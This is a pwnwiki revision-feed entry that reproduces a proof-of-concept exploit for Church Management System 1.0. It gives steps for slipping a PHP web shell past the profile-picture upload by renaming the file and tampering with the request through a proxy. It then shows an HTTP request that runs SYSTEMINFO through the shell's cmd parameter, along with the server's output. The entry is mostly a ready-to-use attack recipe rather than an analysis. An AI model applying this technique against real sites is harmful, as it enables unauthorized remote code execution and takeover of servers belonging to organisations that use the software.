https://pwnwiki.com/index.php?action=history&feed=atom&title=Church_Management_System_1.0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Church Management System 1.0 任意文件上傳&遠程代碼執行漏洞 - Revision history
2026-04-11T09:16:25Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Church_Management_System_1.0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=6421&oldid=prev
Pwnwiki: Created page with "<pre> # Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@bu..."
2021-07-06T01:01:19Z
<p>Created page with "<pre> # Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@bu..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)<br />
# Date: 07/03/2021<br />
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)<br />
# Vendor Homepage: https://www.sourcecodester.com<br />
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html<br />
# Version: 1.0<br />
# Tested on: Windows 10<br />
# CVE : N/A<br />
<br />
# Proof of Concept :<br />
<br />
1- Login any user account and change profile picture.<br />
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)<br />
3- Before uploading your file, intercept your traffic by using any proxy.<br />
4- Change test.php.jpg file to test.php and click forward.<br />
5- Find your test.php file path and try any command.<br />
<br />
<br />
###################### REQUEST ##########################################<br />
<br />
GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1<br />
Host: localhost<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0<br />
Accept: image/webp,*/*<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
Connection: close<br />
Referer: http://localhost/cman/members/dashboard.php<br />
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc<br />
<br />
####################### RESPONSE #########################################<br />
<br />
HTTP/1.1 200 OK<br />
Date: Sat, 03 Jul 2021 11:28:16 GMT<br />
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3<br />
X-Powered-By: PHP/8.0.3<br />
Content-Length: 4410<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8<br />
<br />
<br />
Host Name: MRT<br />
OS Name: Microsoft Windows 10 Pro<br />
OS Version: 10.0.19043 N/A Build 19043<br />
OS Manufacturer: Microsoft Corporation<br />
OS Configuration: Standalone Workstation<br />
OS Build Type: Multiprocessor Free<br />
Registered Owner: Murat <br />
System Boot Time: 6/25/2021, 2:51:40 PM<br />
System Manufacturer: Dell Inc.<br />
System Type: x64-based PC<br />
Processor(s): 1 Processor(s) Installed.<br />
<br />
<br />
############################################################################<br />
</pre></div>
Pwnwiki